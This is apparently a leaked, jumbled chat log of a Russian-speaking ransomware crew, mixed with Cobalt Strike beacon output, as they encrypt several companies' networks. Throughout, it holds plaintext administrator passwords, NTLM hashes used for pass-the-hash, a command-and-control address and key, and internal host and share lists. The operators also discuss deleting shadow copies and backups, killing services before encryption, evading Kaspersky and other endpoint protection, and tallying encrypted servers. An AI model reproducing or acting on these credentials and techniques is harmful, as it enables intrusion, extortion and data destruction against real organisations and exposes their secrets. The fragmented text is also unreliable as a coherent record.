Microsoft_WinInet_127.0.0.1:8888/Resilio Sync\OVERLAND\administrator 01 00 00 d0 8c 9d df 01 15 d1 11 8c 7a 00 c0 4f c2 97 eb 01 00 00 1d e4 39 cf 1d a3 58 45 b0 85 d2 13 e4 2f f1 8a 00 00 00 18 00 00 57 00 49 00 4e 00 45 00 54 00 43 00 72 00 65 00 64 00 00 03 66 00 00 c0 00 00 10 00 00 71 ea fe 67 c8 17 d9 2c 2e 12 e4 22 8c 22 43 02 00 00 00 04 80 00 00 a0 00 00 10 00 00 00 b5 19 a8 93 30 eb e3 90 7f 59 42 64 56 a9 7c 6b 30 00 00 00 dd bc 4f 35 c9 ac 00 f0 56 0a 70 a6 60 e4 c4 6d 18 6c 69 34 b7 bf db 4d e1 39 88 82 9b e4 79 1a d9 ca bc 53 b8 58 9b 97 f7 e7 c6 6a 09 d6 36 c0 14 00 00 00 b6 44 ee 96 18 c2 65 dc 9b 49 d4 dd 0f 06 a1 26 bb fb 32 9f
``````
http://10.69.0.22:5000/ --------------------------- nas
https://10.69.0.173/login.html ------------------------- idrac-HYPERVDEV2|PowerEdge R320
https://10.69.0.70/login.html --------------------------- idrac-7ND5CZ1 | PowerEdge R520
```в истории был ласт пасс, но кред не было, думал что его креды подойдут, написал что бы не залочить в будущем на ласт пасс был в его браузере?к `https://lastpass.com`куда?у Логана есть ласт пасс, но пароль `M@ythe4th!` не подошёл``
URL : https://mail.overland.com/
Username : overland\administrator
Password : Vi3wSon!c
``````
URL : https://id.atlassian.com/signup/welcome
Username : logan@overland.com
Password : M@ythe4th!
``````
URL : https://gravityzone.bitdefender.com/
Username : logan@overland.com
Password : M@ythe4th!
``````
10.69.26.205\OVR026-R002\R002 r002
10.69.0.242\TEST044-R002\R002 r002
2 домена из 3-4 пкда
в том домене уже работайте, как подготовите, я вам дам сессии из 2х прод доменов
``` там, получается, еще два домена?
видно только один трастсначала залезаете сюда и там уже работайте``
Pinging AD1.overland.com [10.69.0.35] with 32 bytes of data:
Reply from 10.69.0.35: bytes=32 time=10ms TTL=127
Ping statistics for 10.69.0.35:
Packets: Sent = 1, Received = 1, Lost = 0 (0% loss),
Approximate round trip times in milli-seconds:
Minimum = 10ms, Maximum = 10ms, Average = 10ms
beacon> portscan 10.69.0.35 445 none
[*] Tasked beacon to scan ports 445 on 10.69.0.35
[+] host called home, sent: 93285 bytes
[+] received output:
10.69.0.35:445
Scanner module is complete
```user9tl2ot``
overland.com\dynamics:bobc@t!
overland.com\Administrator:Vi3wSon!c
overland.com\mahesh.admin:Changeme!
overland.com\zerto:CR@CKer$
```вышли на связьзнаю что НАС)мало лиокейтам только директория документов была, остальные уже были пустыеэто же НАСони были пустыми или вы их почистили?``
Directory of \\89.0.10.104\Music
04/10/2019 04:05 PM .
04/10/2019 04:01 PM ..
0 File(s) 0 bytes
2 Dir(s) 1,660,207,595,520 bytes free
[+] received output:
Volume in drive \89.0.10.104\Pictures is Pictures
Volume Serial Number is 8C90-29F2
Directory of \\89.0.10.104\Pictures
04/10/2019 04:05 PM .
04/10/2019 04:01 PM ..
0 file(s) 0 bytes
2 Dir(s) 1,660,207,595,520 bytes free
beacon> shell dir \\89.0.10.104\Videos
[*] Tasked beacon to run: dir \\89.0.10.104\Videos
[+] host called home, sent: 55 bytes
[+] received output:
Volume in drive \\89.0.10.104\Videos is Videos
Volume Serial Number is 42A8-E058
Directory of \\89.0.10.104\Videos
04/10/2019 04:05 PM .
04/10/2019 04:01 PM ..
0 file(s) 0 bytes
2 Dir(s) 1,660,207,595,520 bytes free
``просто либо они как то его откатили или мы не закрылион работал во время лока?я на нём под рдпне закрыт почему то``
dn:CN=FR-VIR2008-02,OU=Beaune Servers,OU=RTP,DC=rtpco,DC=local
>objectClass: top
>objectClass: person
>objectClass: organizationalPerson
>objectClass: user
>objectClass: computer
>cn: FR-VIR2008-02
>distinguishedName: CN=FR-VIR2008-02,OU=Beaune Servers,OU=Beaune,OU=RTP,DC=rtpco,DC=local
>instanceType: 4
>whenCreated: 20170630081330.0Z
>whenChanged: 20201222161043.0Z
>uSNCreated: 3171670
>info: General
>uSNChanged: 7602866
>name: FR-VIR2008-02
>objectGUID: {1A3B911B-4323-4851-905A-C22EE5FB2BC5}
>userAccountControl: 4096
>codePage: 0
>countryCode: 0
>lastLogon: 131862572618621371
>localPolicyFlags: 0
>pwdLastSet: 132515171874060018
>primaryGroupID: 515
>objectSid: S-1-5-21-3928074412-3075804946-2887454908-18665
>accountExpires: 9223372036854775807
>logonCount: 0
>sAMAccountName: FR-VIR2008-02
>sAMAccountType: 805306369
>operatingSystem: Windows Server 2008 R2 Standard
>operatingSystemVersion: 6.1 (7601)
>operatingSystemServicePack: Service Pack 1
>dNSHostName: FR-VIR2008-02.rtpco.local
``по рдп бы на сервер, замапить диск и утилитой пройтисьсейчас зайдуоперативно``
104.243.44.69:13574
Cqr7797e1iSJyzFwnyTPoECVpWqqOSUGUZ7
```работай через эту кобуа то отвалятсялучше не спавнитьтам вообще около 10 живых3056``
beacon> net domain
[*] Tasked beacon to run net domain
[+] host called home, sent: 257 bytes
[+] received output:
rtpco.local
```у меня нет живыхкинь её в меняни в какой кобе?больше никаких нет?и удалите теневые копизатерите там фриспейс после удаления бэкапатут кто нибудь 1 нуженпометочку сделал)
спасиболадно раз удали похуйда``
beacon> help mv
Use: mv [source file] [dest file]
Move source file to the specified destination
beacon> help cp
Use: cp [source file] [dest file]
Copy source file to the specified destination
```и cp вродекоба кст тоже умеела в mvдаты про del?shell del жетакпросто rm в кобе работает а shell rm не даётокей интересно....прикол в том что через команду не даёт удалить, а вот через гуй всё норм удаляетно странная хуйня что не дает менять но дает удалять)))проверьте остальные папкисносиаксес из дэнайдя не могу понять что за хрень, копи мув не работают, а вот снести сноситсяоектам мб вы их move куда нибудь и заширфуете?дасерьезно?+а дает?а может просто удалить их и не париться ?который на насеперезапишет его?echo 1 > файл бэкапа самый старый[ ](https://mediaeveryone.com/group/1-done-rtpcompany-com?msg=skgH6wEiuWraA93mM) это[ ](https://mediaeveryone.com/group/1-done-rtpcompany-com?msg=9iffb4WttEQtYmzbk) Даостальные файлы тоже заняты процессами?как я понял, нет прав на эти файлы
на запись то туда естьу меня тоже на 2-х типах эта шибкатак что?или только 1 последнего?у всех эта ошибка?а чего удивляесь что не сработало)akses iz denaidпереименовали?@tl2 говорил что зависит от редакции + он говорил что он защищает процесс а вы делали это через мап[ ](https://mediaeveryone.com/group/1-done-rtpcompany-com?msg=X6jW2zvhB4xZy4DAc) .тут был каспер на армах?Заглотил прям по саму раму))))говорил же хуйца хряпает каспер)) @tl2допишите им то самое расширениеа переименуйте файлы на насеа повторный запуск на серверах где проецс не закончил?все 5 живы до сих пор[ ](https://mediaeveryone.com/group/1-done-rtpcompany-com?msg=CLumsmxBztKP6w9pw) ужеееи оттуда запуститеили на арм живойна сервер где есть сессияв старых всё норм шифровало и видно было к сежится, а как будто сук терминаторзамапте этот наснет, там вроде все было подобное что только часть файлов закрывалась?в старых сетяхвсмысле так же ?[ ](https://mediaeveryone.com/group/1-done-rtpcompany-com?msg=zaEjaabka5bHD9ZZM) ?вот видишь, только что залилв данный момент есть?ну я закидывал туда файл с ДК под кредами и сервака под другими кредами (креды и тачки с разных доменов)доступ на запись точно есть?вчера я его мапил на 2 тачки, сегодня проверив замапил ещё на 3 и запустил повторно на 5-ти тачкахдо этог было так же?+ ДКна 5 разных тачкахнас где был замаплен?остальные все живынан их был мап?ну несколько тачек отлетело[ ](https://mediaeveryone.com/group/1-done-rtpcompany-com?msg=huJe2tEuab32Xa7C9)?файл 300 кбесли будет написано что он битый то окоткрываетсяи откройте егокоторый не закрытзаберите 1 док файлобрыва сессий не было?VirtualAlloc видит и всепалятся сами принципы инжектированияи по итогу у тебя сессия есть
но даже В НЕ ничего не заинжектитьдаже малварный процес)как только процес создается - каспер начинает его защищатьясното есть ты "создаешь" процес а не внедряешься в другойон стейджинг канал из своего файла же налаживаетбикон "в себе "нета бикон разве не заинжекчен?а инжектится не даст никак (ну вот запуск бинаря он пропустить может если вычищено нормальнону вопрос редакции там исключительноНиразу не встречал его, а скасперам даже комета на ура пролитает)))плюс он стартуется onboot его хрен прибьешьсесию пропустит
но заинжектить не дастнет, каспер именно
очень зол в правильной там от редакции зависитРазве не битдефендеъна админском компе стоялсамый сильный авер это каспер в плане мем интегритимб опять путаетекаспер или касея?каспер мы не обойдем инжектомблять
каспер это плохонакрутили ему защиту что лисимантик чет в последнее время кусачий сталТут же каспер индерпонт на некоторых чтиоялсамантек - очень грозныйа что в вилсоне с авером?и по 1 на 2 другие)3 человека будут с ним работатьтак что с вилнсонарт не все так просто)у нас проблемы вилсонарт
там 6 трастов ещевсезде есть доступ, но либо дл крашится, либо траф блочитсядаесть еще две с правами+ еще 2или новые подоспеют?так осталась же только #wilsonart-comна завтра планируется 3 сетки за день)завтра к 51.done.rtpcompany.comзавтра ко скольки?молодцывсенеплохое ЕДР решение и так бесполезно проболталось в сетито что кассея соснула это прям как бальзам)```
winona.rtpco.local
118 тачек по ад
64 армов на винде (10 живых)
53 сервера (71 живой)
всё притянуто и вся пошифровано
``отличноимелось ввиду не подтянулось, но замаплены и крит процесы убиты
```
Не подтянулось 8 серверов
``us.alloypolymers.com
ЗАкрыто серверов 24 из 24
Армы подтянули все 23rtpco.local
ЗАкрыто серверов 64 из 65
Армы подтянули все 152
один дк отвалился\щас, он какую-то херню посчтиталсекундуне всясколько по адне всяэто не вся статазакрытыхпишите скколько было пингующихсяда, стату готовим``
rtpco.local
65 servakov
152 arma
```
```
us.alloypolymers.com
arm 23
serv 24
```
Не подтянулось 8 серверовзакончили?так ну чтотам тоже обработаноесть Епо крайней мере темп и сис32а диск другой? тиап Д или мб там ест ькакой другой?и папку Windows не тронулоага?я так понимаю оно и не лезет тудаи там и там``
06/19/2019 07:00 PM Windows Defender
06/10/2020 01:13 AM Windows Mail
06/10/2020 01:13 AM Windows Media Player
07/16/2016 07:23 AM Windows Multimedia Platform
07/16/2016 07:23 AM Windows NT
06/10/2020 01:13 AM Windows Photo Viewer
07/16/2016 07:23 AM Windows Portable Devices
07/16/2016 07:23 AM WindowsPowerShell
```но в програм файлах и програм файлах х86 не тронуло вот этовезде сегодняшня датачтобы посмотретьможешь проверить даты тача файлов и папок рукамиреспавн?появиление записки не является гарантией того что локер прошелся по всему винчу``
у меня 1 приказала долго жить, но ридми на ней появился
```
если при этом отвалился процес куда инжект был - то локер встал соответственноа после процес не отпал?появился до тогоу меня 1 приказала долго жить, но ридми на ней появилсяи статистику по всем доменасесии не покрашились при инжекте?вобщем
кассею мы обошли
размеренно покуривая?видимо)) от радостиа че орешьесли везде есть - можно и дк хлопануть тогда уже = )ПРОВЕРИЛИРЕДМИ ЕСТЬдобиваем и ДК всекогда все остальное умретдк ебашим?их на конец как всегдану кроме ДК@tl1@tl2?,лочим все сразускули есть агаа, там естьскули ещекаких-то других сервисов которые могут важные даные заниматьтам нечем дополнить батник?на всякий случай напминаю что надо покилять сервисы не забыть на замапленных тачкахесли у вас вопросы есть он дописану вас же роадмап)конечноrjytxyjмапи?То что выше не притянуть @tl1``
pth us.alloypolymers.com\adonixadmin 88781646e2a2399370c54bae7f790e58
ALLOYAMMS: 10.1.1.231 -
ALLOYCRKT01: 10.1.5.250 -
OHSPICEWORKS: 10.1.10.11 -
ALLOYORGAPP01: 10.1.8.11 -
ALLOYLICWEB: 10.1.1.238 ---
ALLOYAPP3: 10.1.1.250 ---
rtpco.local\O365Service 7facdc498ed1680c4fd1448319a8c04f
AXFORMS-DEV: 10.89.11.111 -
ONBASETEST: 10.89.11.10 -
89.0.10.121 -
89.0.192.80 -
89.0.191.172 -
89.0.192.3 -
89.0.193.15 -
10.1.10.146 -
89.0.192.202 -
10.58.58.91 -
10.89.11.34 -
``````
89.0.10.121 -
89.0.192.80 -
89.0.191.172 -
89.0.192.3 -
89.0.193.15 -
10.1.10.146 -
89.0.192.202 -
10.58.58.91 -
10.89.11.34 -
``````
ALLOYEXCH02: 10.1.1.240 +
GAHDC2: 10.1.10.81 +
GAHDC01: 10.1.10.82 +
``спасибо[ ](https://mediaeveryone.com/group/rtpcompany-com?msg=Y7LiqEPosNs6nCCna) rtpco.localребят скиньте адюзерс со всех доменов``
ALLOYLICWEB: 10.1.1.238 ---
ALLOYAPP3: 10.1.1.250 ---
``````
rtpco.local\O365Service 7facdc498ed1680c4fd1448319a8c04f
AXFORMS-DEV: 10.89.11.111 -
ONBASETEST: 10.89.11.10 -
``Попробуйте притянуть``
pth us.alloypolymers.com\adonixadmin 88781646e2a2399370c54bae7f790e58
ALLOYAMMS: 10.1.1.231 -
ALLOYEXCH02: 10.1.1.240 -
GAHDC2: 10.1.10.81 -
ALLOYCRKT01: 10.1.5.250 -
OHSPICEWORKS: 10.1.10.11 -
ALLOYORGAPP01: 10.1.8.11 -
GAHDC01: 10.1.10.82 -
``cancelet 8669993c0b6f8d65cd206a0c9e1d598bO365Service 7facdc498ed1680c4fd1448319a8c04fя переместилкобу с #wilsonart-com только не убейте``
74.118.138.118
https://neteric.com
----------------------------------------------------------------------------------------
104.243.44.69:13574
Cqr7797e1iSJyzFwnyTPoECVpWqqOSUGUZ7
``````
++rtpco.local SERV++
AXAOS-TEST: 10.89.11.123
AXAOS-TRAINING: 10.89.11.122
WINONAV1: 10.89.11.22
AXBATCH-TEST: 10.89.11.112
AXAOS-BUILD: 10.89.11.120
SAN-HQ: 10.89.11.35
AXDEV3: 10.89.11.103
AXDEV6: 10.89.11.106
AXDEV1: 10.89.11.101
MINITABLIC: 10.89.11.6
AXDEV2: 10.89.11.102
TX-TESTSRV1: 10.58.0.166
AXSQL-DEV: 10.89.11.118
MXSTORAGE: 10.13.0.14
NEVADAHYPV1: 10.57.0.84
NVSTORAGE: 10.57.0.36
NVDC1: 10.57.0.32
MNDC2: 89.0.0.83
NEVADAHYPV1: 10.57.0.25
++us.alloypolymers.com++
RICHMONDDC1: 10.1.1.248
ALLOYLICWEB: 10.1.1.238
ALLOYAPP3: 10.1.1.250
``````
++rtpco.local SERV++
STORAGEWINONA: 10.89.11.13
CTXCONNECTOR1: 10.89.11.26
CTXCONNECTOR2: 10.89.11.27
RDSL: 10.89.11.21
SQLPROD1: 10.89.0.99
CTXAPP3: 10.89.11.28
KASEYA: 10.89.11.24
CTXAPP4: 10.89.11.11
ONBASETEST: 10.89.11.10
ONBASEPROD1: 10.89.11.7
ONBASETEST01: 10.89.11.33
WEBPROD01: 10.89.11.31
PDM01: 10.89.11.32
MAINTENANCE: 10.89.11.40
SOLARWINDS: 10.89.11.2
WINPAK01: 10.89.0.111
MNDC2: 89.0.0.81
STORAGEWINONA2: 10.89.11.14
EXCHANGE: 10.89.11.10
AXFORMS-DEV: 10.89.11.111
INDYDC1: 10.59.0.4
ADMT: 10.89.11.5
AXREPORTS-DEV: 10.89.11.121
``````
++rtpco.local SERV++
FRANCEDC1: 10.4.0.25
FRANCEDC2: 10.4.0.26
FRANCESTORAGE: 10.4.0.27
FRANCEPRINTSRV: 10.4.0.28
GERMANYDC1: 10.20.0.40
GERMANYDC2: 10.20.0.41
EN-VIR2008-02: 10.4.0.19
GERMANYSTORAGE: 10.20.0.42
FRANCESAGE: 10.4.0.100
FRANCEINTERMEC: 10.4.0.72
FRANCEARCHIVE: 10.4.0.10
POLSTORAGE: 10.28.0.8
DC1POLAND: 10.28.0.5
DC2POLAND: 10.28.0.6
DELLOME: 10.89.11.16
INDC2: 10.59.0.31
CAE1: 10.89.11.12
RTPSYSLOG: 89.0.192.125
INDYSTORAGE: 10.59.0.35
INVEEAM: 10.59.0.21
RTPAZAD: 10.89.0.190
RDSAPP4: 89.0.192.163
SYMMGR: 10.89.11.20
``````
++rtpco.local++
SG20170712-NB: 10.5.1.89
24L5: 10.33.2.239
RTP-KEN: 10.7.2.208
30L43: 89.0.192.45
ADAM-DESKTOP: 89.0.192.87
BBDESK2: 89.0.192.80
23LL37: 89.0.193.36
23LL7: 10.12.1.7
29LL32: 10.25.0.136
31LL45: 10.36.5.247
CANCELETPC: 10.89.11.3 ПРИТЯНУТЬ ВСЕ ДИСКИ
METROMTRREADER: 89.0.191.183
29LL9: 10.1.8.104
30L29: 10.1.8.157
DENNIS10: 10.33.255.253
LUNCHROOM2: 89.0.6.100
DEPCON10B: 89.0.192.150
30L59: 172.22.200.30
WIN7-INTERMEC: 10.4.72.72
26L22: 10.33.4.245
24L19: 172.22.200.18
25L32: 89.0.192.169
24L3: 10.33.1.250
25L21: 172.22.200.26
26L08: 10.58.0.197
29L06: 89.0.191.87
INDYTEST1: 10.59.0.105
25L12: 89.0.193.67
DEPCON10A: 89.0.192.146
32LL62: 89.0.192.244
30L69: 89.0.192.35
VIDEOINSIGHTDR: 10.89.11.33
DUCKLING: 10.89.11.22
30L85: 89.0.192.92
26L07: 10.12.1.3
24L11: 10.58.0.135
26L13: 10.58.6.11
ORION24: 89.0.191.71
25L58: 10.58.0.231
28L24: 10.57.0.85
EQL-SAN1: 10.89.5.100
QATHERMAL: 89.0.191.80
30L60: 89.0.192.78
````SDIJ*FHg78SDFGTI&SDtARTE%YET`не забудьте WOL``
++rtpco.local++
28LL75: 172.22.200.29
30L22: 10.1.5.151
W10-F2018-VIB: 10.4.1.46
W10-F2014-PYBA: 10.4.1.103
EQL-SAN2: 10.89.5.120
26L05: 172.22.200.24
30LL29: 89.0.192.177
30L17: 10.25.0.142
32LL29: 89.0.191.227
W10-P2017-LOG1: 10.28.0.179
26L29: 10.59.0.107
30L54: 89.0.191.174
28L10: 89.0.191.39
30L24A: 10.1.5.208
WINPAK-CLIENT: 10.89.11.1
30L03: 10.36.6.234
30L18: 172.22.200.76
26L59: 89.0.193.94
28LL56: 89.0.192.215
30L102: 10.59.0.120
30L96: 89.0.191.196
25L9: 89.0.191.43
SUZHOU-PROD: 10.7.2.61
33LL67: 89.0.192.215
28L40: 10.56.0.124
30L51: 10.56.0.126
DENNIS15: 89.0.88.20
DCHDESKTOP: 89.0.88.18
26L30: 89.0.191.217
30L41: 89.0.191.245
27L06: 89.0.192.160
25L5: 172.22.200.62
27L05: 172.22.200.59
25L52: 10.33.2.249
30L94: 10.59.0.156
28L16: 89.0.192.60
WIN7-2016-CHG: 10.28.0.100
AXUPS: 10.89.11.35
KEMPENBOXX: 89.0.193.108
26L47: 10.25.0.130
BSDESKTOP: 89.0.10.101
5CG5093XY1: 10.1.8.146
MXL5040QYD-1: 10.1.8.220
``````
++rtpco.local++
PRTMONITOR: 10.89.11.36
30L19: 89.0.192.127
27L04: 89.0.10.121
DEPCON10EM: 89.0.192.116
30L42: 89.0.192.83
27L12: 10.56.0.166
27L07: 89.0.191.57
DENNISH10: 10.33.255.252
25L43: 172.22.200.66
30L47: 10.59.0.113
30L100: 89.0.192.80
30L98: 10.59.0.148
30L30: 10.1.8.145
25L38: 89.0.192.172
30LL56: 89.0.191.172
30L36: 10.1.8.143
25L29: 89.0.192.3
PHONEROOMFR: 10.4.1.96
25L42: 89.0.193.15
30L65: 10.1.10.146
30L15: 172.22.200.16
VC1: 172.22.254.20
27L28: 172.22.200.11
WININTERMEC32: 89.0.192.202
32LL58: 10.58.58.91
26L15: 10.13.0.92
25L37: 89.0.192.47
USH832L0DT: 10.1.8.128
30L14: 10.36.5.236
UPS580: 89.0.191.216
SBRENNO: 89.0.193.38
22L10INDY: 10.89.11.34
25L23: 89.0.192.114
AVANITEN: 10.89.11.34
28L19: 89.0.191.215
W10-EN2018-CYC: 10.4.1.13
DEPCON10EN: 89.0.192.141
30L10: 89.0.193.76
26L251: 10.32.1.188
30L107: 89.0.191.64
25L59: 89.0.191.46
31LL19: 89.0.192.102
25L60: 89.0.193.101
``так ну что начинаем?поработайте еще тут тогдаhttps://www.alibisecurity.com/alibi-central-management-software`http://10.0.0.202/doc/page/login.asp` - ALIBI
`http://10.0.0.21/````
SCCY-DC 10.0.0.5
TS 10.0.0.252
SCCY-LT08 10.0.0.22
SCCY-LT09 10.0.0.99
SCCY-LT10 10.0.0.88
TOOLROOM7106 10.1.4.150
RYAN-GT73VR 10.1.4.164
QVPRO-PC 10.0.0.93
QATRACKING 10.0.0.113
PRODUCTION-LT 192.168.113.2
ASSEMBLYROOM 10.0.0.28
MIKE-PC 10.1.4.210
MFGWIN10-1 10.0.0.110
SCCY-TOOLING 10.0.0.19
JOE-BOXX-W10 10.0.0.103
JOE-AIO2 10.0.0.89
ENGINEERING-PC2 10.1.4.205
ENGINEERING-PC1 10.1.4.178
CONNIE-MICRO 10.0.0.82
SCCY-FS 10.0.0.6
SCCY-16 10.0.0.102
SCCY-15 10.0.0.118
SCCY-12 10.0.0.111
SCCY-11 10.0.0.123
SCCY-10 10.0.0.41
SCCY-14 10.0.0.17
SCCY-09 10.0.0.119
SCCY-08 10.0.0.128
SCCY-07 10.0.30.143
SCCY-06 10.0.0.146
SCCY-21 10.0.0.147
SCCY-17 10.0.0.149
SCCY-TN01 10.0.30.147
SCCY-13 10.0.0.148
SCCY-18 10.0.0.116
SCCY-04 10.0.0.40
SCCY-03 10.0.0.57
SCCY-02 10.0.0.84
SCCY-19 10.0.0.62
SCCY-05 10.0.0.59
SCCY-01 10.0.0.76
DESKTOP-UMQJ809 10.1.4.230
SCCY-20 10.1.4.221
SCCY-NAS 10.1.4.175
SCCY-RECEIVING 10.0.0.91
SQL-VM 10.1.4.99
SCCY-LT3 10.0.0.75
SCCY-LT04 10.0.0.67
SCCY-LT05 10.0.0.71
SCCY-LT07 10.0.0.26
SCCY-MASONACS 10.0.30.3
``````
SCCY\vdsadmin T@ng0D0wn!
SCCY\VannData Y33tC@nn0ns
``пожалуйстаспасибоuser7а удалить забыл тк мозг работает даже не на 20% из-за такого кайфового графика работы[ ](https://mediaeveryone.com/group/sccy-com?msg=Q5how5FjdR49GsnJs) если что нтдс этот не связан схэшами, это из мимика штука для ключей гугловских паролейточнее они были вышенет вопрос или что-то делалкто запускалзаебись, при расчете зп если у кого-то вылетит из головы будет норм видимовылетело из головыПонятия не имеювопросы вышечто?@user3 @user8[ ](https://mediaeveryone.com/group/sccy-com?msg=AL5cvDTfm6YBeQdpn) я нигдесетка то маленькая, там он работал то от силы секунд 10...где вы его еще запускали?шанс дропа после его запуска в разы вышебх без параметров ОЧЕНЬ сильно шумитя сколько раз писал в конце рабочего дня - удалять файлы, сессии в слипя хз, это не япочему удалено``
199.4KB file 01/25/2021 17:31:02 msupdate.dll
1.2KB file 01/25/2021 17:39:36 ntds.pvk
```[ ](https://mediaeveryone.com/group/sccy-com?msg=xHQhm9FkNFqXrZRnm) Снимали бадхаунд? Если да то без параметров[ ](https://mediaeveryone.com/group/sccy-com?msg=BXrTsqRRDACMxqPoM) ?[ ](https://mediaeveryone.com/group/sccy-com?msg=4NT5tunCGfpFfNY84) как снимали? какие параметры запуска были?``
[+] Location: C:\Windows\Temp\*
Size Type Last Modified Name
---- ---- ------------------- ----
dir 01/25/2021 19:03:15 F18AC62B-E695-47FF-B459-2750FF73338D-Sigs
dir 01/01/2021 13:35:09 WinSAT
1.5MB file 01/25/2021 19:14:36 MpCmdRun.log
773.6KB file 01/25/2021 19:03:34 MpSigStub.log
199.4KB file 01/25/2021 17:31:02 msupdate.dll
1.2KB file 01/25/2021 17:39:36 ntds.pvk
256.0KB file 10/14/2020 17:41:18 TS_784C.tmp
320.0KB file 10/14/2020 17:41:29 TS_A6D2.tmp
1.0MB file 11/17/2020 08:43:16 UpdHealthTools.msi
``почему так грязно работаете?все по старому, креды только от 1 НАСа+добавьте всех в expFederal.com
закрывать же будемПо крайней мере у меня не получаетсяЭто какато лаба в ней ничего не сделать``
https://cloudgw.cpcc.edu/vpn/index.html
```
а с этим у тебя что?)Конечноrjytxyj)ты с ними?не вижу конфуда я создамexpFederal.com = hobbes?
под нее конфу надо?``
\\USCHI-HD001.Hobbes.loc\ADMIN$ - Remote Admin
\\USCHI-HD001.Hobbes.loc\C$ - Default share
\\USCHI-HD001.Hobbes.loc\IPC$ - Remote IPC
\\USCHI-HD001.Hobbes.loc\print$ - Printer Drivers
\\USCHI-APG003.Hobbes.loc\ADMIN$ - Remote Admin
\\USCHI-APG003.Hobbes.loc\C$ - Default share
\\USCHI-APG003.Hobbes.loc\E$ - Default share
\\USCHI-APG003.Hobbes.loc\F$ - Default share
\\USCHI-APG003.Hobbes.loc\IPC$ - Remote IPC
\\PCHIVHH001.Hobbes.loc\ADMIN$ - Remote Admin
\\PCHIVHH001.Hobbes.loc\C$ - Default share
\\PCHIVHH001.Hobbes.loc\E$ - Default share
\\PCHIVHH001.Hobbes.loc\IPC$ - Remote IPC
\\PCHIVHH001.Hobbes.loc\V$ - Default share
\\PCHIAPG015.Hobbes.loc\ADMIN$ - Remote Admin
\\PCHIAPG015.Hobbes.loc\C$ - Default share
\\PCHIAPG015.Hobbes.loc\IPC$ - Remote IPC
\\USCHI-MAXP001.Hobbes.loc\ADMIN$ - Remote Admin
\\USCHI-MAXP001.Hobbes.loc\C$ - Default share
\\USCHI-MAXP001.Hobbes.loc\IPC$ - Remote IPC
\\USCHI-MAXP001.Hobbes.loc\M$ - Default share
\\USCHI-MAXP001.Hobbes.loc\print$ - Printer Drivers
\\USCHI-LT002.Hobbes.loc\ADMIN$ - Remote Admin
\\USCHI-LT002.Hobbes.loc\C$ - Default share
\\USCHI-LT002.Hobbes.loc\IPC$ - Remote IPC
\\USCHI-NET005.Hobbes.loc\ADMIN$ - Remote Admin
\\USCHI-NET005.Hobbes.loc\C$ - Default share
\\USCHI-NET005.Hobbes.loc\E$ - Default share
\\USCHI-NET005.Hobbes.loc\IPC$ - Remote IPC
\\USCHI-NET005.Hobbes.loc\print$ - Printer Drivers
\\PCHIFSP001.Hobbes.loc\ADMIN$ - Remote Admin
\\PCHIFSP001.Hobbes.loc\Apps -
\\PCHIFSP001.Hobbes.loc\ARCH -
\\PCHIFSP001.Hobbes.loc\C$ - Default share
\\PCHIFSP001.Hobbes.loc\Cad -
\\PCHIFSP001.Hobbes.loc\Citrix - Citrix Profiles
\\PCHIFSP001.Hobbes.loc\CIVIL -
\\PCHIFSP001.Hobbes.loc\COMM -
\\PCHIFSP001.Hobbes.loc\COMP -
\\PCHIFSP001.Hobbes.loc\CONST -
\\PCHIFSP001.Hobbes.loc\D$ - Default share
\\PCHIFSP001.Hobbes.loc\ELEC -
\\PCHIFSP001.Hobbes.loc\EXEC -
\\PCHIFSP001.Hobbes.loc\F$ - Default share
\\PCHIFSP001.Hobbes.loc\FS-0043 -
\\PCHIFSP001.Hobbes.loc\FS-0044 -
\\PCHIFSP001.Hobbes.loc\HR -
\\PCHIFSP001.Hobbes.loc\IPC$ - Remote IPC
\\PCHIFSP001.Hobbes.loc\IROA - IROA - ActiveInk Docs
\\PCHIFSP001.Hobbes.loc\MARKET -
\\PCHIFSP001.Hobbes.loc\MECH -
\\PCHIFSP001.Hobbes.loc\MKTG - Business Operations
\\PCHIFSP001.Hobbes.loc\NASUtils - PowerVault NAS Utilities
\\PCHIFSP001.Hobbes.loc\Network -
\\PCHIFSP001.Hobbes.loc\Pccommon -
\\PCHIFSP001.Hobbes.loc\proj_ae -
\\PCHIFSP001.Hobbes.loc\proj_cvl -
\\PCHIFSP001.Hobbes.loc\proj_str -
\\PCHIFSP001.Hobbes.loc\PTW6512 -
\\PCHIFSP001.Hobbes.loc\Restricted$ -
\\PCHIFSP001.Hobbes.loc\Safety -
\\PCHIFSP001.Hobbes.loc\SCANS -
\\PCHIFSP001.Hobbes.loc\SECTLDR -
\\PCHIFSP001.Hobbes.loc\Software$ - expFederal Software
\\PCHIFSP001.Hobbes.loc\Standard -
\\PCHIFSP001.Hobbes.loc\STRUCT -
\\PCHIFSP001.Hobbes.loc\Sys - Project Folders
\\PCHIFSP001.Hobbes.loc\TENGCNST -
\\PCHIFSP001.Hobbes.loc\User$ - Users Folders
\\USCHI-NET001.Hobbes.loc\ADMIN$ - Remote Admin
\\USCHI-NET001.Hobbes.loc\C$ - Default share
\\USCHI-NET001.Hobbes.loc\E$ - Default share
\\USCHI-NET001.Hobbes.loc\IPC$ - Remote IPC
\\USCHI-NET001.Hobbes.loc\print$ - Printer Drivers
\\USCHI-NET001.Hobbes.loc\Software$ -
\\USCHI-NET001.Hobbes.loc\USCHI-PLT-0008 - Oce ColorWare Plotter 300
\\USCHI-MSE001.Hobbes.loc\address -
\\USCHI-MSE001.Hobbes.loc\ADMIN$ - Remote Admin
\\USCHI-MSE001.Hobbes.loc\C$ - Default share
\\USCHI-MSE001.Hobbes.loc\E$ - Default share
\\USCHI-MSE001.Hobbes.loc\F$ - Default share
\\USCHI-MSE001.Hobbes.loc\G$ - Default share
\\USCHI-MSE001.Hobbes.loc\IPC$ - Remote IPC
\\USCHI-MSE004.Hobbes.loc\address -
\\USCHI-MSE004.Hobbes.loc\ADMIN$ - Remote Admin
\\USCHI-MSE004.Hobbes.loc\C$ - Default share
\\USCHI-MSE004.Hobbes.loc\E$ - Default share
\\USCHI-MSE004.Hobbes.loc\F$ - Default share
\\USCHI-MSE004.Hobbes.loc\G$ - Default share
\\USCHI-MSE004.Hobbes.loc\IPC$ - Remote IPC
\\USCHI-APG004.Hobbes.loc\ADMIN$ - Remote Admin
\\USCHI-APG004.Hobbes.loc\Analytics_c8466842-1a17-4bad-abad-7d935647974b -
\\USCHI-APG004.Hobbes.loc\C$ - Default share
\\USCHI-APG004.Hobbes.loc\E$ - Default share
\\USCHI-APG004.Hobbes.loc\F$ - Default share
\\USCHI-APG004.Hobbes.loc\gthrsvc_c8466842-1a17-4bad-abad-7d935647974b-crawl-0 - Crawled Files Sharec8466842-1a17-4bad-abad-7d935647974b-crawl-0
